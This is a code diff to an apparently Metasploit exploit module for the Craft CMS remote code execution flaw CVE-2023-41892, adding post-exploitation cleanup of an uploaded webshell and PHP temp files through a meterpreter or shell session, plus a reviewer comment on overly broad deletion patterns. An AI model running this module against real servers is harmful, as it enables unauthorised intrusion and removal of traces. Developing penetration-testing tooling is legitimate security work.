diff --git a/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb b/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
index 588419578906..41ac6f9e1840 100644
--- a/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
+++ b/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
@@ -237,6 +237,32 @@ def execute_command(cmd, _opts = {})
 })
 end
+ def on_new_session(session)
+ # cleanup webshell in DOCUMENT_ROOT
+ register_files_for_cleanup("#{@config['document_root']}/#{@webshell_name}")
+
+ # Imagick plugin generates a php file with MSL code in the directory set by
+ # the PHP ini setting "upload_tmp_dir". This file gets executed to generate the webshell.
+ # A manual cleanup procedure is required to identify and remove the php* files when the session is established.
+ if session.type == 'meterpreter'
+ session.fs.dir.chdir(@config['upload_tmp_dir'].to_s)
+ clean_files = session.fs.dir.entries
+ unless clean_files.nil? || clean_files.empty?
+ clean_files.each do |f|
+ register_files_for_cleanup("#{@config['upload_tmp_dir']}/#{f}") if f.match(/php+/)
+ end
+ end
+ else
+ clean_files = session.shell_command_token("ls #{@config['upload_tmp_dir']}/php*")
+ unless clean_files.nil? || clean_files.empty?
+ clean_files.split(' ').each do |f|
+ register_files_for_cleanup(f.to_s)
+ end
+ end
+ end
+ super
+ end
+
 def check
 check_phpinfo
 return CheckCode::Appears unless @config['upload_tmp_dir'].nil? || @config['document_root'].nil?
@@ -249,7 +275,6 @@ def exploit
 check_phpinfo unless datastore['AutoCheck']
 fail_with(Failure::NotVulnerable, 'Could not get required phpinfo. System is likely patched.') if @config['upload_tmp_dir'].nil? || @config['document_root'].nil?
 fail_with(Failure::UnexpectedReply, "Webshell #{@webshell_name} upload failed.") unless upload_webshell
- register_files_for_cleanup(@webshell_name.to_s)
 print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
 case target['Type']
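Review bot: The cleanup filter in the meterpreter branch of `on_new_session` (first hunk), `f.match(/php+/)`, is unanchored, so every entry in `upload_tmp_dir` whose name merely contains "php" is registered for deletion, including files this run did not create. If the artifacts follow PHP's usual temp-file naming (`php` plus six characters, worth confirming on the target platform), an anchored test such as `if f.match?(/\Aphp[A-Za-z0-9]{6}\z/)` keeps the cleanup to them. The shell branch is equally broad through the `php*` glob, and when nothing matches, the `ls` error text may come back in `clean_files` and be split into bogus paths; listing with `ls -1d` and discarding stderr would avoid that. A short comment stating that only artifacts created by this module should be removed would also make the intended scope explicit, since the directory value comes from the target's phpinfo output and may be a shared location such as a system temp directory.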